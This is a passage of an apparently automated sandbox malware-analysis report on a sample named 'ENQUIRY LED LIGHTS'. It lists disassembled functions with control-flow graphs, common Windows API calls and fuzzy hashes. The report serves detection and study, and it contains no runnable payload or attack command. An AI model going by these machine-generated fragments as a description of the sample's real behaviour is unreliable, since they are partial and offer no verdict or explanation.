4c1a0d7-4c1a0fb 392->398 393->392 404 4c1a15c-4c1a18a 397->404 405 4c1a13f-4c1a15a 397->405 429 4c1a104-4c1a108 398->429 430 4c1a0fd-4c1a102 398->430 418 4c1a192-4c1a19e 404->418 405->418 414 4c19f71-4c19f73 408->414 409->414 417 4c19f68-4c19f6b 409->417 421 4c19f75 414->421 422 4c19f7a-4c19f7e 414->422 417->414 440 4c1a1a4-4c1a1b0 418->440 418->441 421->422 427 4c19f80-4c19f87 422->427 428 4c19f8c-4c19f92 422->428 438 4c1a029-4c1a02d 427->438 433 4c19f94-4c19f9a 428->433 434 4c19f9c-4c19fa1 428->434 429->322 437 4c1a10e-4c1a111 429->437 439 4c1a114-4c1a125 430->439 442 4c19fa7-4c19fad 433->442 434->442 437->439 444 4c1a04c-4c1a058 438->444 445 4c1a02f-4c1a049 438->445 479 4c1a127 call 4c1a660 439->479 480 4c1a127 call 4c1a670 439->480 441->322 449 4c19fb3-4c19fb8 442->449 450 4c19faf-4c19fb1 442->450 444->364 444->365 445->444 454 4c19fba-4c19fcc 449->454 450->454 452 4c1a12d-4c1a135 452->418 460 4c19fd6-4c19fdb 454->460 461 4c19fce-4c19fd4 454->461 462 4c19fe1-4c19fe8 460->462 461->462 465 4c19fea-4c19fec 462->465 466 4c19fee 462->466 470 4c19ff3-4c19ffe 465->470 466->470 471 4c1a000-4c1a003 470->471 472 4c1a022 470->472 471->438 474 4c1a005-4c1a00b 471->474 472->438 475 4c1a012-4c1a01b 474->475 476 4c1a00d-4c1a010 474->476 475->438 478 4c1a01d-4c1a020 475->478 476->472 476->475 478->438 478->472 479->452 480->452
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hxq$Hxq$Hxq$Hxq$Hxq
                                                                                                  • API String ID: 0-615405233
                                                                                                  • Opcode ID: 3a7ce0f6907f6ca4c9955befb21dbb830928b0d54a1b5791197d299828eba586
                                                                                                  • Instruction ID: b822f29f31c0892a4f4934512b387f7fa828f1ac7f3aa932b1a1dff2c7cbe806
                                                                                                  • Opcode Fuzzy Hash: 3a7ce0f6907f6ca4c9955befb21dbb830928b0d54a1b5791197d299828eba586
                                                                                                  • Instruction Fuzzy Hash: 6C428D70E002588FDB54DFB9C894B9EBBF2AF89300F148169D40AAB355DB34AD45DFA1
                                                                                                  Function 06B50040 Relevance: .6, Instructions: 640COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1740315324.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6b50000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e59241366c472bef15f30c88bca075cdb1a35cd0b9489a71f886592e44f95072
                                                                                                  • Instruction ID: 25edf3120b69426b3cc3f61784b87bf78cd1be6c19b35a97a7d21196c1108a27
                                                                                                  • Opcode Fuzzy Hash: e59241366c472bef15f30c88bca075cdb1a35cd0b9489a71f886592e44f95072
                                                                                                  • Instruction Fuzzy Hash: A1328CB0B012448FDB65EB69C454BAEB7F6EF89304F1544A9E906DB3A1CB34ED02CB51
                                                                                                  Function 04C1E768 Relevance: .5, Instructions: 482COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 678fe91442fe0f396240afab3f6cea0b18f02776c790dbb427b4f3947a681bbb
                                                                                                  • Instruction ID: 14ebed22fc5b6396d31a6644028471bface6f47b40aa18d4370f985f615ce5c6
                                                                                                  • Opcode Fuzzy Hash: 678fe91442fe0f396240afab3f6cea0b18f02776c790dbb427b4f3947a681bbb
                                                                                                  • Instruction Fuzzy Hash: 6532D274901259CFDB50DF69C584A8EFBB2FF49351F55C1A5D808AB221DB30E986CFA0
                                                                                                  Function 04C19C98 Relevance: .3, Instructions: 284COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91b1b9c1603c548ed789073d173d20f9925e80428995eb42fe162019a0893b7c
                                                                                                  • Instruction ID: abdee1d261d59b80b81c3f723a4bb1941725bf97ab822301a77e35ebe7244f3c
                                                                                                  • Opcode Fuzzy Hash: 91b1b9c1603c548ed789073d173d20f9925e80428995eb42fe162019a0893b7c
                                                                                                  • Instruction Fuzzy Hash: C0C15C74E00219DFDF14CFA5C89479ABBF2AF8A304F14C1A9D409AB265DB31E985DF50
                                                                                                  Function 04C11BF0 Relevance: .3, Instructions: 256COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69a5d029624ee0a730d5c4f07d501efa1c9e56dcef488f4b03bde8749fee1755
                                                                                                  • Instruction ID: 041363e4fb8cc30a7ab9799fbed707666b9b7597c1114d641dd797ea21432f55
                                                                                                  • Opcode Fuzzy Hash: 69a5d029624ee0a730d5c4f07d501efa1c9e56dcef488f4b03bde8749fee1755
                                                                                                  • Instruction Fuzzy Hash: 18A18375E0031A9FCB04DFA4D8949DDBBBAFF8A300F188619E515AB2A5DF30A941DF50
                                                                                                  Function 04C1E758 Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aef003b29ec6e2be7b6a74164fff2e50da942082bc659c50fdcdae4da64d2bfc
                                                                                                  • Instruction ID: ba00926eb2dc1c52bec1434410e5ad0d35f4f2ebcfa7ae7e68f73682099b5d68
                                                                                                  • Opcode Fuzzy Hash: aef003b29ec6e2be7b6a74164fff2e50da942082bc659c50fdcdae4da64d2bfc
                                                                                                  • Instruction Fuzzy Hash: EF41FA71E006198FEB58CF6AC84179EBBB3BFC9300F04C0A6D51DA7265EB301A859F51
                                                                                                  Function 00CED0B0 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 481 ced0b0-ced14f GetCurrentProcess 485 ced158-ced18c GetCurrentThread 481->485 486 ced151-ced157 481->486 487 ced18e-ced194 485->487 488 ced195-ced1c9 GetCurrentProcess 485->488 486->485 487->488 489 ced1cb-ced1d1 488->489 490 ced1d2-ced1ed call ced699 488->490 489->490 494 ced1f3-ced222 GetCurrentThreadId 490->494 495 ced22b-ced28d 494->495 496 ced224-ced22a 494->496 496->495
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED13E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 00CED17B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED1B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00CED211
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: 7626f66c125ed6630d79cabd64eaa96b6705e4579f281d889c85cf1888035a53
                                                                                                  • Instruction ID: cfafc9f443147c3a7fa147fc4998fa9a778035cceec94be0c3ecf2574ac2421c
                                                                                                  • Opcode Fuzzy Hash: 7626f66c125ed6630d79cabd64eaa96b6705e4579f281d889c85cf1888035a53
                                                                                                  • Instruction Fuzzy Hash: A15166B0D01289CFDB14CFAAD548B9EBBF1EF88314F248459E019A7350DB749984CF65
                                                                                                  Function 00CED0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 503 ced0c0-ced14f GetCurrentProcess 507 ced158-ced18c GetCurrentThread 503->507 508 ced151-ced157 503->508 509 ced18e-ced194 507->509 510 ced195-ced1c9 GetCurrentProcess 507->510 508->507 509->510 511 ced1cb-ced1d1 510->511 512 ced1d2-ced1ed call ced699 510->512 511->512 516 ced1f3-ced222 GetCurrentThreadId 512->516 517 ced22b-ced28d 516->517 518 ced224-ced22a 516->518 518->517
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED13E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 00CED17B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED1B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00CED211
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: d66c98542030c068ed23665cf40bbbadf122c0869b8a40244c5b590776f42e8c
                                                                                                  • Instruction ID: 7cf2fbbc72dcfa4b693c1c2399a80ad087510090ad5e70ef2155e69c6d36ab4d
                                                                                                  • Opcode Fuzzy Hash: d66c98542030c068ed23665cf40bbbadf122c0869b8a40244c5b590776f42e8c
                                                                                                  • Instruction Fuzzy Hash: F45165B0D01249CFDB14CFAAD648B9EBBF5EF88314F248459E01AA7350DB74A984CF65
                                                                                                  Function 00CEAE28 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 587 ceae28-ceae37 588 ceae39-ceae46 call cea14c 587->588 589 ceae63-ceae67 587->589 596 ceae5c 588->596 597 ceae48 588->597 590 ceae7b-ceaebc 589->590 591 ceae69-ceae73 589->591 598 ceaebe-ceaec6 590->598 599 ceaec9-ceaed7 590->599 591->590 596->589 644 ceae4e call ceb0c0 597->644 645 ceae4e call ceb0b1 597->645 598->599 600 ceaefb-ceaefd 599->600 601 ceaed9-ceaede 599->601 603 ceaf00-ceaf07 600->603 604 ceaee9 601->604 605 ceaee0-ceaee7 call cea158 601->605 602 ceae54-ceae56 602->596 606 ceaf98-ceb058 602->606 607 ceaf09-ceaf11 603->607 608 ceaf14-ceaf1b 603->608 610 ceaeeb-ceaef9 604->610 605->610 637 ceb05a-ceb05d 606->637 638 ceb060-ceb08b GetModuleHandleW 606->638 607->608 611 ceaf1d-ceaf25 608->611 612 ceaf28-ceaf31 call cea168 608->612 610->603 611->612 618 ceaf3e-ceaf43 612->618 619 ceaf33-ceaf3b 612->619 620 ceaf45-ceaf4c 618->620 621 ceaf61-ceaf65 618->621 619->618 620->621 623 ceaf4e-ceaf5e call cea178 call cea188 620->623 642 ceaf68 call ceb3c0 621->642 643 ceaf68 call ceb3b0 621->643 623->621 624 ceaf6b-ceaf6e 627 ceaf70-ceaf8e 624->627 628 ceaf91-ceaf97 624->628 627->628 637->638 639 ceb08d-ceb093 638->639 640 ceb094-ceb0a8 638->640 639->640 642->624 643->624 644->602 645->602
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CEB07E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: dd2b8ca510e638d1e09e1c07f8a1282e7a0b1c0082e29631bbcf27e049c3958e
                                                                                                  • Instruction ID: 7b764e72864dbcf1650c81a0290b50f526d7cbb990dc3b17103c09246b94d23d
                                                                                                  • Opcode Fuzzy Hash: dd2b8ca510e638d1e09e1c07f8a1282e7a0b1c0082e29631bbcf27e049c3958e
                                                                                                  • Instruction Fuzzy Hash: 737123B0A00B858FD724DF6AD45175ABBF1FF88300F008A29E49ADBA50DB74F945CB91
                                                                                                  Function 04C118E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 646 4c118e4-4c11956 647 4c11961-4c11968 646->647 648 4c11958-4c1195e 646->648 649 4c11973-4c11a12 CreateWindowExW 647->649 650 4c1196a-4c11970 647->650 648->647 652 4c11a14-4c11a1a 649->652 653 4c11a1b-4c11a53 649->653 650->649 652->653 657 4c11a60 653->657 658 4c11a55-4c11a58 653->658 659 4c11a61 657->659 658->657 659->659
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C11A02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: be0f206b383f89600b0eb34520148a49cddf2d0e8ecad9b7d65d215f3d8b612f
                                                                                                  • Instruction ID: 2defabd324e1d5d3d91a0fc7480ddfe55a3e21a807a28923e0b1023df4cfdebb
                                                                                                  • Opcode Fuzzy Hash: be0f206b383f89600b0eb34520148a49cddf2d0e8ecad9b7d65d215f3d8b612f
                                                                                                  • Instruction Fuzzy Hash: 8B51C4B1D10349DFDB14CF99D484ADDBFB6BF49310F24812AE819AB210D775A945CF50
                                                                                                  Function 04C118F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 660 4c118f0-4c11956 661 4c11961-4c11968 660->661 662 4c11958-4c1195e 660->662 663 4c11973-4c11a12 CreateWindowExW 661->663 664 4c1196a-4c11970 661->664 662->661 666 4c11a14-4c11a1a 663->666 667 4c11a1b-4c11a53 663->667 664->663 666->667 671 4c11a60 667->671 672 4c11a55-4c11a58 667->672 673 4c11a61 671->673 672->671 673->673
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C11A02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: d079e04e64a299c2186e0dc14f714c5c36a21aaa16fffa0ed7cb78b3eb68815d
                                                                                                  • Instruction ID: e5a511da3e8596da8a25c7b40e89f2e79a42e7f75db5f6571c0a734dd61f9d8d
                                                                                                  • Opcode Fuzzy Hash: d079e04e64a299c2186e0dc14f714c5c36a21aaa16fffa0ed7cb78b3eb68815d
                                                                                                  • Instruction Fuzzy Hash: 0841C3B1D00349DFDB14CF99C884ADEBFB6BF49310F24812AE819AB210D775A945CF50
                                                                                                  Function 00CE44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 674 ce44b0-ce59d9 CreateActCtxA 677 ce59db-ce59e1 674->677 678 ce59e2-ce5a3c 674->678 677->678 685 ce5a3e-ce5a41 678->685 686 ce5a4b-ce5a4f 678->686 685->686 687 ce5a60 686->687 688 ce5a51-ce5a5d 686->688 690 ce5a61 687->690 688->687 690->690
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00CE59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 1c320a599a73afaa0cf84d6d8ef62578c32b9d5152318aeb306766bf20281c00
                                                                                                  • Instruction ID: 4a966e42c7fd722e2d86c7213b648884819f0c6513b51f07f54d746d97130156
                                                                                                  • Opcode Fuzzy Hash: 1c320a599a73afaa0cf84d6d8ef62578c32b9d5152318aeb306766bf20281c00
                                                                                                  • Instruction Fuzzy Hash: E741D0B0D0075DCADB24CFAAC884ADEBBF5BF48314F20816AD408AB251DB756946CF90
                                                                                                  Function 00CE590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 691 ce590c-ce590e 692 ce5919-ce59d9 CreateActCtxA 691->692 694 ce59db-ce59e1 692->694 695 ce59e2-ce5a3c 692->695 694->695 702 ce5a3e-ce5a41 695->702 703 ce5a4b-ce5a4f 695->703 702->703 704 ce5a60 703->704 705 ce5a51-ce5a5d 703->705 707 ce5a61 704->707 705->704 707->707
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00CE59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: b840bbbac754cae5bff435e06fd98d52434490b3aee159f053be225a25c56582
                                                                                                  • Instruction ID: 98651676c0624ba7be87a54db00e679061ac86452501efb8d979dd1e2d6dcb8d
                                                                                                  • Opcode Fuzzy Hash: b840bbbac754cae5bff435e06fd98d52434490b3aee159f053be225a25c56582
                                                                                                  • Instruction Fuzzy Hash: 3441D2B0D00759CEDB24CFAAC885BDEBBF5BF49314F20816AD408AB251DB756946CF50
                                                                                                  Function 04C14040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 708 4c14040-4c1407c 709 4c14082-4c14087 708->709 710 4c1412c-4c1414c 708->710 711 4c14089-4c140c0 709->711 712 4c140da-4c14112 CallWindowProcW 709->712 716 4c1414f-4c1415c 710->716 718 4c140c2-4c140c8 711->718 719 4c140c9-4c140d8 711->719 714 4c14114-4c1411a 712->714 715 4c1411b-4c1412a 712->715 714->715 715->716 718->719 719->716
                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04C14101
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 6522129b86f761a1afeda5e1013a59b0b561af6a84d04f4b4d0bcd489c657b2c
                                                                                                  • Instruction ID: 102131b199b503b69e519a218d646ed5117e775825986756557c5ce782bff419
                                                                                                  • Opcode Fuzzy Hash: 6522129b86f761a1afeda5e1013a59b0b561af6a84d04f4b4d0bcd489c657b2c
                                                                                                  • Instruction Fuzzy Hash: F2413CB8A00359CFCB14CF99C448A9ABBF6FF89314F24C459D519AB321D735A941CFA4
                                                                                                  Function 04C1A670 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 722 4c1a670-4c1a682 723 4c1a68a-4c1a695 722->723 724 4c1a685 call 4c198c4 722->724 725 4c1a697-4c1a6a7 723->725 726 4c1a6aa-4c1a73c CreateIconFromResourceEx 723->726 724->723 729 4c1a745-4c1a762 726->729 730 4c1a73e-4c1a744 726->730 730->729
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 83fc3170b372c7a973c36671480e4e62a9df8762222912f973a8a221e561252e
                                                                                                  • Instruction ID: 5c61c5e412a9aeedfcadb9a4ebd4c3e9c7d3697f61e05a97408e9f86f1e3e87d
                                                                                                  • Opcode Fuzzy Hash: 83fc3170b372c7a973c36671480e4e62a9df8762222912f973a8a221e561252e
                                                                                                  • Instruction Fuzzy Hash: C3319A719052889FCB01CFA9C844AEEBFF9EF09310F14805AE514AB221C336A955DFA1
                                                                                                  Function 04C198B8 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04C1A68A,?,?,?,?,?), ref: 04C1A72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 76311ae5ee4bbc105c4f2c5b9f4f03fbd1bd52e22fdd072ce3e3e7c50f3ee532
                                                                                                  • Instruction ID: e6f86d8bfdcbf00c09791ec9af8f0c94da7732dc9a72ea5321c5369230f81da5
                                                                                                  • Opcode Fuzzy Hash: 76311ae5ee4bbc105c4f2c5b9f4f03fbd1bd52e22fdd072ce3e3e7c50f3ee532
                                                                                                  • Instruction Fuzzy Hash: 16218CB5900259DFDB10CFAAC884BEEBFF8EF49320F24841AE554A7210D335A945DFA5
                                                                                                  Function 00CED708 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 733 ced708-ced70a 734 ced710-ced7a4 DuplicateHandle 733->734 735 ced7ad-ced7ca 734->735 736 ced7a6-ced7ac 734->736 736->735
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CED797
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 8ed86e887fc1451c6b6963f7f237249ea59f29fe3d5cc654de28308356a285f1
                                                                                                  • Instruction ID: 58d79d807bc9fe0c5b3f65d731f2ec639b90190e140797235597ec1d5721c8db
                                                                                                  • Opcode Fuzzy Hash: 8ed86e887fc1451c6b6963f7f237249ea59f29fe3d5cc654de28308356a285f1
                                                                                                  • Instruction Fuzzy Hash: 0021E3B5900249EFDB10CFAAD984AEEFFF8EB48320F14845AE914A7250D374A945CF65
                                                                                                  Function 00CED710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CED797
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: ea2a30b64773966a1cfd2603411c6bdaee54c332fd5fefbeedc9da8ce7d5842b
                                                                                                  • Instruction ID: 990018295ba92b58a9ecc02272fca0856c24492ad37a867acec93907dcc263dd
                                                                                                  • Opcode Fuzzy Hash: ea2a30b64773966a1cfd2603411c6bdaee54c332fd5fefbeedc9da8ce7d5842b
                                                                                                  • Instruction Fuzzy Hash: ED21C4B5900248DFDB10CF9AD984ADEBBF8EB48320F14845AE914A7350D375A954CF65
                                                                                                  Function 04C198C4 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04C1A68A,?,?,?,?,?), ref: 04C1A72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 4233d619126baa9ec681f66e7fc3cf4b3cd788609d72077634940b51838d3447
                                                                                                  • Instruction ID: 5260b837c41e3806618551cb1dcb949bd1c9cbddceef5a27ec3a06bdfd3bd216
                                                                                                  • Opcode Fuzzy Hash: 4233d619126baa9ec681f66e7fc3cf4b3cd788609d72077634940b51838d3447
                                                                                                  • Instruction Fuzzy Hash: 541126B5900249DFDB10CFAAD848BEEBFF9EB48320F14841AE914A7210D375A954DFA5
                                                                                                  Function 00CEB018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CEB07E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
